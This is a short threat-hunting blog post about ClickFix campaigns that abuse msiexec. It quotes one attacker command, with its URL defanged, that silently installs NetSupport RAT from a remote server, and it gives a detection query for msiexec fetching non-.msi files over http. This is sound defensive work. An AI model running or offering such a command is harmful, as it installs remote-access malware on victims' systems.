235. Adversaries Abuse Msiexec as a Part of ClickFix
Hello everyone!
There're lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique: System Binary Proxy Execution: Msiexec (T1218.007).
This time the adversary abused msiexec to install NetSupport RAT to the compromised system:
msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45
For example, we can look for msiexec running files without .msi extension from a remote server:
event_type: "processcreatewin"
AND
proc_file_path: "msiexec.exe"
AND
cmdline: *http*
AND NOT
cmdline: *msi*
See you tomorrow!
Comments
Post a Comment